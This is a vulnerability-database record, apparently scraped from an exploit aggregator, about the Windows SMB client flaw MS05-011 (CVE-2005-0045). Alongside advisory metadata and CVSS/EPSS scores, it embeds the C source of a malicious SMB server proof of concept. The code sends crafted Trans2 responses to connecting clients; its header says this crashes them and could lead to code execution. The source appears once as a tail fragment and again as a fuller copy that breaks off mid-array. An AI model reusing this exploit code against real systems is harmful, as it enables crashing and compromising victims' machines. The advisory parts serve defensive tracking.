unsigned long treeid )\r\n{\r\n\tchar response[1024];\r\n\r\n\tbzero ( &response, sizeof ( response ) );\r\n\trecv ( s, response, sizeof ( response ) -1, 0 );\r\n\r\n\tprintf ( "NetBios2\\n" );\r\n\tNetBios2[30] = response[30];\r\n\tNetBios2[31] = response[31];\r\n\tNetBios2[34] = response[34];\r\n\tNetBios2[35] = response[35];\r\n\r\n\tstrncpy ( NetBios2 + 28, ( unsigned char* ) &treeid, 2 );\r\n\tstrncpy ( NetBios2 + 32, ( unsigned char* ) &userid, 2 );\r\n\r\n\tsend ( s, NetBios2, sizeof ( NetBios2 ) -1, 0 );\r\n\r\n\tbzero ( &response, sizeof ( response ) );\r\n\trecv ( s, response, sizeof ( response ) -1, 0 );\r\n\r\n\tprintf ( "Trans2Response1\\n" );\r\n\tTrans2Response1[30] = response[30];\r\n\tTrans2Response1[31] = response[31];\r\n\tTrans2Response1[34] = response[34];\r\n\tTrans2Response1[35] = response[35];\r\n\r\n\tstrncpy ( Trans2Response1 + 28, ( unsigned char* ) &treeid, 2 );\r\n\tstrncpy ( Trans2Response1 + 32, ( unsigned char* ) &userid, 2 );\r\n\r\n\tsend ( s, Trans2Response1, sizeof ( Trans2Response1 ) -1, 0 );\r\n\r\n\tbzero ( &response, sizeof ( response ) );\r\n\trecv ( s, response, sizeof ( response ) -1, 0 );\r\n\r\n\tprintf ( "Trans2Response2\\n" );\r\n\tTrans2Response2[30] = response[30];\r\n\tTrans2Response2[31] = response[31];\r\n\tTrans2Response2[34] = response[34];\r\n\tTrans2Response2[35] = response[35];\r\n\r\n\tstrncpy ( Trans2Response2 + 28, ( unsigned char* ) &treeid, 2 );\r\n\tstrncpy ( Trans2Response2 + 32, ( unsigned char* ) &userid, 2 );\r\n\r\n\tsend ( s, Trans2Response2, sizeof ( Trans2Response2 ) -1, 0 );\r\n\r\n\tbzero ( &response, sizeof ( response ) );\r\n\trecv ( s, response, sizeof ( response ) -1, 0 );\r\n\r\n\tprintf ( "Trans2Response3\\n" );\r\n\tTrans2Response3[30] = response[30];\r\n\tTrans2Response3[31] = response[31];\r\n\tTrans2Response3[34] = response[34];\r\n\tTrans2Response3[35] = response[35];\r\n\r\n\tstrncpy ( Trans2Response3 + 28, ( unsigned char* ) &treeid, 2 );\r\n\tstrncpy ( Trans2Response3 + 32, ( unsigned char* ) &userid, 2 );\r\n\r\n\tsend ( s, Trans2Response3, sizeof ( Trans2Response3 ) -1, 0 );\r\n}\r\n\r\nint\r\nmain ( int argc, char* argv[] )\r\n{\r\n\tint s1, s2, i;\r\n\tunsigned long fid = 0x1337;\r\n\tunsigned long treeid = 0x0808;\r\n\tunsigned long userid = 0x0808;\r\n\tunsigned long assocgroup = 0x4756;\r\n\tpid_t childpid;\r\n\tsocklen_t clilen;\r\n\tstruct sockaddr_in cliaddr, servaddr;\r\n\r\n\tbzero ( &servaddr, sizeof ( servaddr ) );\r\n\tservaddr.sin_family = AF_INET;\r\n\tservaddr.sin_addr.s_addr = htonl ( INADDR_ANY );\r\n\tservaddr.sin_port = htons ( PORT );\r\n\r\n\ts1 = socket ( AF_INET, SOCK_STREAM, 0 );\r\n\tbind ( s1, ( struct sockaddr * ) &servaddr, sizeof ( servaddr ) );\r\n\tlisten ( s1, 1 );\r\n\r\n\tclilen = sizeof ( cliaddr );\r\n\r\n\ts2 = accept ( s1, ( struct sockaddr * ) &cliaddr, &clilen );\r\n\r\n\tclose ( s1 );\r\n\r\n\tprintf ( "\\n%s\\n\\n", inet_ntoa ( cliaddr.sin_addr ) );\r\n\r\n\tneg ( s2 ); // Negotiate\r\n\tsessionsetup ( s2, userid, treeid, 0 ); // SessionSetup\r\n\tfor ( i = 0; i < 15; i++ )\r\n\t{\r\n\t\tdigg ( s2, fid, assocgroup, userid, treeid, 0 );\r\n\t\tfid++;\r\n\t\tassocgroup ++;\r\n\t}\r\n\tdigg ( s2, fid, assocgroup, userid, treeid, 1 ); // NetrShareEnum\r\n\tfid++;\r\n\tassocgroup ++;\r\n\tdigg ( s2, fid, assocgroup, userid, treeid, 2 ); // spoolss\r\n\tfid++;\r\n\tassocgroup ++;\r\n\tfor ( i = 0; i < 4; i++ )\r\n\t{\r\n\t\tdigg ( s2, fid, assocgroup, userid, treeid, 0 );\r\n\t\tfid++;\r\n\t\tassocgroup ++;\r\n\t}\r\n\tdigg ( s2, fid, assocgroup, userid, treeid, 3 ); // WinReg\r\n\tuserid++;\r\n\ttreeid++;\r\n\tsessionsetup ( s2, userid, treeid, 1 ); // SessionSetup\r\n\tuserid--;\r\n\ttreeid--;\r\n\tfor ( i = 0; i < 2; i++ )\r\n\t{\r\n\t\tdigg ( s2, fid, assocgroup, userid, treeid, 4 ); // NetBios\r\n\t\tfid++;\r\n\t\tassocgroup ++;\r\n\t}\r\n\ttreeid += 2;\r\n\texploit ( s2, fid, assocgroup, userid, treeid );\r\n\r\n\tprintf ( "done!\\n" );\r\n\r\n\tclose ( s2 );\r\n}\r\n\r\n// milw0rm.com [2005-06-23]\r\n\n ", "id": "SSV:15611", "enchantments_done": [], "type": "seebug", "lastseen": "2017-11-19T22:35:27", "reporter": "Root", "enchantments": {"score": {"value": -0.4, "vector": "NONE"}, "dependencies": {"references": [{"type": "canvas", "idList": ["GAPPLE_CLIENT"]}, {"type": "cert", "idList": ["VU:652537"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2013-2923", "CPAI-2014-1504"]}, {"type": "cve", "idList": ["CVE-2005-0045"]}, {"type": "exploitdb", "idList": ["EDB-ID:1065"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:004E35192175CCEFC0D4DF00275595C0"]}, {"type": "nessus", "idList": ["SMB_NT_MS05-011.NASL"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:7771"]}]}, "backreferences": {"references": [{"type": "canvas", "idList": ["GAPPLE_CLIENT"]}, {"type": "cert", "idList": ["VU:652537"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2013-2923", "CPAI-2014-1504"]}, {"type": "cve", "idList": ["CVE-2005-0045"]}, {"type": "exploitdb", "idList": ["EDB-ID:1065"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:004E35192175CCEFC0D4DF00275595C0"]}, {"type": "nessus", "idList": ["SMB_NT_MS05-011.NASL"]}]}, "exploitation": null, "epss": [{"cve": "CVE-2005-0045", "epss": "0.966550000", "percentile": "0.993540000", "modified": "2023-03-14"}], "vulnersScore": -0.4}, "references": [], "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1659907127, "score": 1659907470, "epss": 1678851499}, "_internal": {"score_hash": "b6be15657de0b51559a792818d2414ba"}}

{"checkpoint_advisories": [{"lastseen": "2022-11-28T06:40:56", "description": "A remote code execution vulnerability has been reported in the Microsoft Windows Server Message Block (SMB) client component. A remote attacker can exploit this vulnerability by sending a specially crafted message to an affected system. Successful exploitation would allow an attacker to take complete control of the target.", "cvss3": {}, "published": "2014-05-13T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Windows SMB Response Handling Buffer Overflow - ver 2 (CVE-2005-0045)", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2005-0045"], "modified": "2014-05-01T00:00:00", "id": "CPAI-2014-1504", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-12-17T12:13:53", "description": "A remote code execution vulnerability has been reported in the Microsoft Windows Server Message Block (SMB) client component. A remote attacker can exploit this vulnerability by sending a specially crafted message to an affected system. Successful exploitation would allow an attacker to take complete control of the target.", "cvss3": {}, "published": "2013-09-09T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Windows SMB Response Handling Buffer Overflow (CVE-2005-0045)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": true}, "cvelist": ["CVE-2005-0045"], "modified": "2016-02-14T00:00:00", "id": "CPAI-2013-2923", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "canvas": [{"lastseen": "2021-07-28T14:33:27", "description": "**Name**| gapple_client \n---|--- \n**CVE**| CVE-2005-0045 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| GREENAPPLE (MS05-011) \n**Notes**| CVE Name: CVE-2005-0045 \nVENDOR: Microsoft \nPre-exploitation: Requires CANVAS to be run as root/administrator \nMSADV: MS05-011 \nMSRC: http://www.microsoft.com/technet/security/Bulletin/MS05-011.mspx \nCVE Url: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0045 \nCVSS: 7.5 \n\n", "cvss3": {}, "published": "2005-05-02T04:00:00", "type": "canvas", "title": "Immunity Canvas: GAPPLE_CLIENT", "bulletinFamily": "exploit", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": true}, "cvelist": ["CVE-2005-0045"], "modified": "2005-05-02T04:00:00", "id": "GAPPLE_CLIENT", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/gapple_client", "sourceData": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:33", "description": "\nMicrosoft Windows - SMB Transaction Response Handling (MS05-011)", "cvss3": {}, "published": "2005-06-23T00:00:00", "type": "exploitpack", "title": "Microsoft Windows - SMB Transaction Response Handling (MS05-011)", "bulletinFamily": "exploit", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": true}, "cvelist": ["CVE-2005-0045"], "modified": "2005-06-23T00:00:00", "id": "EXPLOITPACK:004E35192175CCEFC0D4DF00275595C0", "href": "", "sourceData": "/*\n * Windows SMB Client Transaction Response Handling\n *\n * MS05-011\n * CAN-2005-0045\n *\n * This works against >> Win2k <<\n *\n * cybertronic[at]gmx[dot]net\n * http://www.livejournal.com/users/cybertronic/\n *\n * usage:\n * gcc -o mssmb_poc mssmb_poc.c\n * ./mssmb_poc\n *\n * connect via \\\\ip\n * and hit the netbios folder!\n *\n * ***STOP: 0x00000050 (0xF115B000,0x00000001,0xFAF24690,\n * 0x00000000)\n * PAGE_FAULT_IN_NONPAGED_AREA\n *\n * The Client reboots immediately\n *\n * Technical Details:\n * -----------------\n *\n * The driver MRXSMB.SYS is responsible for performing SMB\n * client operations and processing the responses returned\n * by an SMB server service. A number of important Windows\n * File Sharing operations, and all RPC-over-named-pipes,\n * use the SMB commands Trans (25h) and Trans2 (32h). A\n * malicious SMB server can respond with specially crafted\n * Transaction response data that will cause an overflow\n * wherever the data is handled, either in MRXSMB.SYS or\n * in client code to which it provides data. One example\n * would be if the\n *\n * file name length field\n *\n * and the\n *\n * short file name length field\n *\n * in a Trans2 FIND_FIRST2 response packet can be supplied\n * with inappropriately large values in order to cause an\n * excessive memcpy to occur when the data is handled.\n * In the case of these examples an attacker could leverage\n * file:// links, that when clicked by a remote user, would\n * lead to code execution.\n *\n */\n\n#include <stdio.h>\n#include <sys/socket.h>\n#include <netinet/in.h>\n#include <netdb.h>\n\n#define PORT\t445\n\nunsigned char SmbNeg[] =\n\"\\x00\\x00\\x00\\x55\"\n\"\\xff\\x53\\x4d\\x42\" // SMB\n\"\\x72\" // SMB Command: Negotiate Protocol (0x72)\n\"\\x00\\x00\\x00\\x00\" // NT Status: STATUS_SUCCESS (0x00000000)\n\"\\x98\" // Flags: 0x98\n\"\\x53\\xc8\" // Flags2 : 0xc853\n\"\\x00\\x00\" // Process ID High: 0\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" // Signature: 0000000000000000\n\"\\x00\\x00\" // Reserved: 0000\n\"\\x00\\x00\" // Tree ID: 0\n\"\\xff\\xfe\" // Process ID: 65279\n\"\\x00\\x00\" // User ID: 0\n\"\\x00\\x00\" // Multiplex ID: 0\n\"\\x11\" // Word Count (WCT): 17\n\"\\x05\\x00\" // Dialect Index: 5, greater than LANMAN2.1\n\"\\x03\" // Security Mode: 0x03\n\"\\x0a\\x00\" // Max Mpx Count: 10\n\"\\x01\\x00\" // Max VCs: 1\n\"\\x04\\x11\\x00\\x00\" // Max Buffer Size: 4356\n\"\\x00\\x00\\x01\\x00\" // Max Raw Buffer 65536\n\"\\x00\\x00\\x00\\x00\" // Session Key: 0x00000000\n\"\\xfd\\xe3\\x00\\x80\" // Capabilities: 0x8000e3fd\n\"\\x52\\xa2\\x4e\\x73\\xcb\\x75\\xc5\\x01\" // System Time: Jun 20, 2005 12:08:32.327125000\n\"\\x88\\xff\" // Server Time Zone: /120 min from UTC\n\"\\x00\" // Key Length: 0\n\"\\x10\\x00\" // Byte Count (BCC): 16\n\"\\x9e\\x12\\xd7\\x77\\xd4\\x59\\x6c\\x40\" // Server GUID: 9E12D777D4596C40\n\"\\xbc\\xc0\\xb4\\x22\\x40\\x50\\x01\\xd4\";// BCC0B422405001D4\n\nunsigned char SessionSetupAndXNeg[] = // Negotiate ERROR Response\n\"\\x00\\x00\\x01\\x1b\"\n\"\\xff\\x53\\x4d\\x42\\x73\\x16\\x00\\x00\\xc0\\x98\\x07\\xc8\\x00\\x00\\x00\\x00\"\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n\"\\x00\\x00\" // Tree ID: 0\n\"\\x00\\x00\" // Process ID: 0\n\"\\x00\\x00\" // USER ID\n\"\\x00\\x00\" // Multiplex ID: 0\n\"\\x04\\xff\\x00\\x1b\\x01\\x00\\x00\\xa6\\x00\\xf0\\x00\\x4e\\x54\\x4c\\x4d\\x53\"\n\"\\x53\\x50\\x00\\x02\\x00\\x00\\x00\\x12\\x00\\x12\\x00\\x30\\x00\\x00\\x00\\x15\"\n\"\\x82\\x8a\\xe0\"\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" // NTLM Challenge\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x64\\x00\\x64\\x00\\x42\\x00\\x00\\x00\"\n\"\\x53\\x00\\x45\\x00\\x52\\x00\\x56\\x00\\x49\\x00\\x43\\x00\\x45\\x00\\x50\\x00\"\n\"\\x43\\x00\\x02\\x00\\x12\\x00\\x53\\x00\\x45\\x00\\x52\\x00\\x56\\x00\\x49\\x00\"\n\"\\x43\\x00\\x45\\x00\\x50\\x00\\x43\\x00\\x01\\x00\\x12\\x00\\x53\\x00\\x45\\x00\"\n\"\\x52\\x00\\x56\\x00\\x49\\x00\\x43\\x00\\x45\\x00\\x50\\x00\\x43\\x00\\x04\\x00\"\n\"\\x12\\x00\\x73\\x00\\x65\\x00\\x72\\x00\\x76\\x00\\x69\\x00\\x63\\x00\\x65\\x00\"\n\"\\x70\\x00\\x63\\x00\\x03\\x00\\x12\\x00\\x73\\x00\\x65\\x00\\x72\\x00\\x76\\x00\"\n\"\\x69\\x00\\x63\\x00\\x65\\x00\\x70\\x00\\x63\\x00\\x06\\x00\\x04\\x00\\x01\\x00\"\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x57\\x00\\x69\\x00\\x6e\\x00\\x64\\x00\\x6f\"\n\"\\x00\\x77\\x00\\x73\\x00\\x20\\x00\\x35\\x00\\x2e\\x00\\x31\\x00\\x00\\x00\\x57\"\n\"\\x00\\x69\\x00\\x6e\\x00\\x64\\x00\\x6f\\x00\\x77\\x00\\x73\\x00\\x20\\x00\\x32\"\n\"\\x00\\x30\\x00\\x30\\x00\\x30\\x00\\x20\\x00\\x4c\\x00\\x41\\x00\\x4e\\x00\\x20\"\n\"\\x00\\x4d\\x00\\x61\\x00\\x6e\\x00\\x61\\x00\\x67\\x00\\x65\\x00\\x72\\x00\\x00\";\n\nunsigned char SessionSetupAndXAuth[] =\n\"\\x00\\x00\\x00\\x75\"\n\"\\xff\\x53\\x4d\\x42\\x73\\x00\\x00\\x00\\x00\\x98\\x07\\xc8\\x00\\x00\\x00\\x00\"\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n\"\\x00\\x00\" // Tree ID: 0\n\"\\x00\\x00\" // Process ID: 0\n\"\\x00\\x00\" // USER ID\n\"\\x00\\x00\" // Multiplex ID: 0\n\"\\x04\\xff\\x00\\x75\\x00\\x01\\x00\\x00\\x00\\x4a\\x00\\x4e\\x57\\x00\\x69\\x00\"\n\"\\x6e\\x00\\x64\\x00\\x6f\\x00\\x77\\x00\\x73\\x00\\x20\\x00\\x35\\x00\\x2e\\x00\"\n\"\\x31\\x00\\x00\\x00\\x57\\x00\\x69\\x00\\x6e\\x00\\x64\\x00\\x6f\\x00\\x77\\x00\"\n\"\\x73\\x00\\x20\\x00\\x32\\x00\\x30\\x00\\x30\\x00\\x30\\x00\\x20\\x00\\x4c\\x00\"\n\"\\x41\\x00\\x4e\\x00\\x20\\x00\\x4d\\x00\\x61\\x00\\x6e\\x00\\x61\\x00\\x67\\x00\"\n\"\\x65\\x00\\x72\\x00\\x00\";\n\nunsigned char TreeConnectAndX[] =\n\"\\x00\\x00\\x00\\x38\"\n\"\\xff\\x53\\x4d\\x42\\x75\\x00\\x00\\x00\\x00\\x98\\x07\\xc8\\x00\\x00\\x00\\x00\"\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n\"\\x00\\x00\" // Tree ID: 0\n\"\\x00\\x00\" // Process ID: 0\n\"\\x00\\x00\" // USER ID\n\"\\x00\\x00\" // Multiplex ID: 0\n\"\\x07\\xff\\x00\\x38\\x00\\x01\\x00\\xff\\x01\\x00\\x00\\xff\\x01\\x00\\x00\\x07\"\n\"\\x00\\x49\\x50\\x43\\x00\\x00\\x00\\x00\";\n\nunsigned char SmbNtCreate [] =\n\"\\x00\\x00\\x00\\x87\"\n\"\\xff\\x53\\x4d\\x42\" // SMB\n\"\\xa2\" // SMB Command: NT Create AndX (0xa2)\n\"\\x00\\x00\\x00\\x00\" // NT Status: STATUS_SUCCESS (0x00000000)\n\"\\x98\" // Flags: 0x98\n\"\\x07\\xc8\" // Flags2 : 0xc807\n\"\\x00\\x00\" // Process ID High: 0\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" // Signature: 0000000000000000\n\"\\x00\\x00\" // Reserved: 0000\n\"\\x00\\x00\" // Tree ID: 0\n\"\\x00\\x00\" // Process ID: 0\n\"\\x00\\x00\" // User ID: 0\n\"\\x00\\x00\" // Multiplex ID: 0\n\"\\x2a\" // Word Count (WCT): 42\n\"\\xff\" // AndXCommand: No further commands (0xff)\n\"\\x00\" // Reserved: 00\n\"\\x87\\x00\" // AndXOffset: 135\n\"\\x00\" // Oplock level: No oplock granted (0)\n\"\\x00\\x00\" // FID: 0\n\"\\x01\\x00\\x00\\x00\" // Create action: The file existed and was opened (1)\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" // Created: No time specified (0)\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" // Last Access: No time specified (0)\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" // Last Write: No time specified (0)\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" // Change: No time specified (0)\n\"\\x80\\x00\\x00\\x00\" // File Attributes: 0x00000080\n\"\\x00\\x10\\x00\\x00\\x00\\x00\\x00\\x00\" // Allocation Size: 4096\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" // End Of File: 0\n\"\\x02\\x00\" // File Type: Named pipe in message mode (2)\n\"\\xff\\x05\" // IPC State: 0x05ff\n\"\\x00\" // Is Directory: This is NOT a directory (0)\n\"\\x00\\x00\" // Byte Count (BCC): 0\n\n// crap\n\"\\x00\\x00\\x00\\x0f\\x00\\x00\\x00\\x00\"\n\"\\x00\\x74\\x7a\\x4f\\xac\\x2d\\xdf\\xd9\"\n\"\\x11\\xb9\\x20\\x00\\x10\\xdc\\x9b\\x01\"\n\"\\x12\\x00\\x9b\\x01\\x12\\x00\\x1b\\xc2\";\n\nunsigned char DceRpc[] =\n\"\\x00\\x00\\x00\\x7c\"\n\"\\xff\\x53\\x4d\\x42\\x25\\x00\\x00\\x00\\x00\\x98\\x07\\xc8\\x00\\x00\\x00\\x00\"\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n\"\\x00\\x00\" // Tree ID: 0\n\"\\x00\\x00\" // Process ID: 0\n\"\\x00\\x00\" // USER ID\n\"\\x00\\x00\" // Multiplex ID: 0\n\"\\x0a\\x00\\x00\\x44\\x00\\x00\\x00\\x00\\x00\\x38\\x00\\x00\\x00\\x44\\x00\\x38\"\n\"\\x00\\x00\\x00\\x00\\x00\\x45\\x00\\x00\\x05\\x00\\x0c\\x03\\x10\\x00\\x00\\x00\"\n\"\\x44\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\xb8\\x10\\xb8\\x10\"\n\"\\x00\\x00\\x00\\x00\" // Assoc Group\n\"\\x0d\\x00\\x5c\\x50\\x49\\x50\\x45\\x5c\"\n\"\\x00\\x00\\x00\" // srv or wks\n\"\\x73\\x76\\x63\\x00\\xff\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x04\\x5d\\x88\"\n\"\\x8a\\xeb\\x1c\\xc9\\x11\\x9f\\xe8\\x08\\x00\\x2b\\x10\\x48\\x60\\x02\\x00\\x00\"\n\"\\x00\";\n\nunsigned char WksSvc[] =\n\"\\x00\\x00\\x00\\xb0\"\n\"\\xff\\x53\\x4d\\x42\\x25\\x00\\x00\\x00\\x00\\x98\\x07\\xc8\\x00\\x00\\x00\\x00\"\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n\"\\x00\\x00\" // Tree ID: 0\n\"\\x00\\x00\" // Process ID: 0\n\"\\x00\\x00\" // USER ID\n\"\\x00\\x00\" // Multiplex ID: 0\n\"\\x0a\\x00\\x00\\x78\\x00\\x00\\x00\\x00\\x00\\x38\\x00\\x00\\x00\\x78\\x00\\x38\"\n\"\\x00\\x00\\x00\\x00\\x00\\x79\\x00\\x00\\x05\\x00\\x02\\x03\\x10\\x00\\x00\\x00\"\n\"\\x78\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x60\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n\"\\x64\\x00\\x00\\x00\\xb8\\x0f\\x16\\x00\\xf4\\x01\\x00\\x00\\xe6\\x0f\\x16\\x00\"\n\"\\xd2\\x0f\\x16\\x00\\x05\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x0a\\x00\\x00\\x00\"\n\"\\x00\\x00\\x00\\x00\\x0a\\x00\\x00\\x00\\x53\\x00\\x45\\x00\\x52\\x00\\x56\\x00\"\n\"\\x49\\x00\\x43\\x00\\x45\\x00\\x50\\x00\\x43\\x00\\x00\\x00\\x0a\\x00\\x00\\x00\"\n\"\\x00\\x00\\x00\\x00\\x0a\\x00\\x00\\x00\\x57\\x00\\x4f\\x00\\x52\\x00\\x4b\\x00\"\n\"\\x47\\x00\\x52\\x00\\x4f\\x00\\x55\\x00\\x50\\x00\\x00\\x00\\x00\\x00\\x00\\x00\";\n\nunsigned char SrvSvc[] =\n\"\\x00\\x00\\x00\\xac\"\n\"\\xff\\x53\\x4d\\x42\\x25\\x00\\x00\\x00\\x00\\x98\\x07\\xc8\\x00\\x00\\x00\\x00\"\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n\"\\x00\\x00\" // Tree ID: 0\n\"\\x00\\x00\" // Process ID: 0\n\"\\x00\\x00\" // USER ID\n\"\\x00\\x00\" // Multiplex ID: 0\n\"\\x0a\\x00\\x00\\x74\\x00\\x00\\x00\\x00\\x00\\x38\\x00\\x00\\x00\\x74\\x00\\x38\"\n\"\\x00\\x00\\x00\\x00\\x00\\x75\\x00\\x00\\x05\\x00\\x02\\x03\\x10\\x00\\x00\\x00\"\n\"\\x74\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x5c\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n\"\\x65\\x00\\x00\\x00\\x68\\x3d\\x14\\x00\\xf4\\x01\\x00\\x00\"\n\"\\x80\\x3d\\x14\\x00\" // Server IP\n\"\\x05\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x03\\x10\\x05\\x00\\x9c\\x3d\\x14\\x00\"\n\"\\x0e\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x0e\\x00\\x00\\x00\"\n\"\\x31\\x00\\x39\\x00\\x32\\x00\\x2e\\x00\\x31\\x00\\x36\\x00\\x38\\x00\\x2e\\x00\" // Server IP ( UNICODE )\n\"\\x32\\x00\\x2e\\x00\\x31\\x00\\x30\\x00\\x33\\x00\\x00\\x00\"\n\"\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x55\\x00\"\n\"\\x00\\x00\\x00\\x00\";\n\nunsigned char SmbClose[] =\n\"\\x00\\x00\\x00\\x23\"\n\"\\xff\\x53\\x4d\\x42\" // SMB\n\"\\x04\" // SMB Command: Close (0x04)\n\"\\x00\\x00\\x00\\x00\" // NT Status: STATUS_SUCCESS (0x00000000)\n\"\\x98\" // Flags: 0x98\n\"\\x07\\xc8\" // Flags2 : 0xc807\n\"\\x00\\x00\" // Process ID High: 0\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" // Signature: 0000000000000000\n\"\\x00\\x00\" // Reserved: 0000\n\"\\x00\\x00\" // Tree ID: 0\n\"\\x00\\x00\" // Process ID: 0\n\"\\x00\\x00\" // USER ID\n\"\\x00\\x00\" // Multiplex ID: 0\n\"\\x00\" // Word Count (WCT): 0\n\"\\x00\\x00\"; // Byte Count (BCC): 0\n\nunsigned char NetrShareEnum[] =\n\"\\x00\\x00\\x01\\x90\"\n\"\\xff\\x53\\x4d\\x42\\x25\\x00\\x00\\x00\\x00\\x98\\x07\\xc8\\x00\\x00\\x00\\x00\"\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n\"\\x00\\x00\" // Tree ID: 0\n\"\\x00\\x00\" // Process ID: 0\n\"\\x00\\x00\" // USER ID\n\"\\x00\\x00\" // Multiplex ID: 0\n\"\\x0a\\x00\\x00\\x58\\x01\\x00\\x00\\x00\\x00\\x38\\x00\\x00\\x00\\x58\\x01\\x38\"\n\"\\x00\\x00\\x00\\x00\\x00\\x59\\x01\\x00\\x05\\x00\\x02\\x03\\x10\\x00\\x00\\x00\"\n\"\\x58\\x01\\x00\\x00\\x01\\x00\\x00\\x00\\x40\\x01\\x00\\x00\\x00\\x00\\x00\\x00\"\n\"\\x01\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x54\\x0a\\x17\\x00\\x04\\x00\\x00\\x00\"\n\"\\xa0\\x28\\x16\\x00\\x04\\x00\\x00\\x00\\x80\\x48\\x16\\x00\\x03\\x00\\x00\\x80\"\n\"\\x8a\\x48\\x16\\x00\\x6e\\x48\\x16\\x00\\x00\\x00\\x00\\x00\\x7e\\x48\\x16\\x00\"\n\"\\x48\\x48\\x16\\x00\\x00\\x00\\x00\\x80\\x56\\x48\\x16\\x00\\x20\\x48\\x16\\x00\"\n\"\\x00\\x00\\x00\\x80\\x26\\x48\\x16\\x00\\x05\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n\"\\x05\\x00\\x00\\x00\\x49\\x00\\x50\\x00\\x43\\x00\\x24\\x00\\x00\\x00\\x36\\x00\"\n\"\\x0b\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x0b\\x00\\x00\\x00\\x52\\x00\\x65\\x00\"\n\"\\x6d\\x00\\x6f\\x00\\x74\\x00\\x65\\x00\\x2d\\x00\\x49\\x00\\x50\\x00\\x43\\x00\"\n\"\\x00\\x00\\x37\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\"\n\"\\x6e\\x00\\x65\\x00\\x74\\x00\\x62\\x00\\x69\\x00\\x6f\\x00\\x73\\x00\\x00\\x00\"\n\"\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n\"\\x07\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x07\\x00\\x00\\x00\\x41\\x00\\x44\\x00\"\n\"\\x4d\\x00\\x49\\x00\\x4e\\x00\\x24\\x00\\x00\\x00\\x00\\x00\\x0c\\x00\\x00\\x00\"\n\"\\x00\\x00\\x00\\x00\\x0c\\x00\\x00\\x00\\x52\\x00\\x65\\x00\\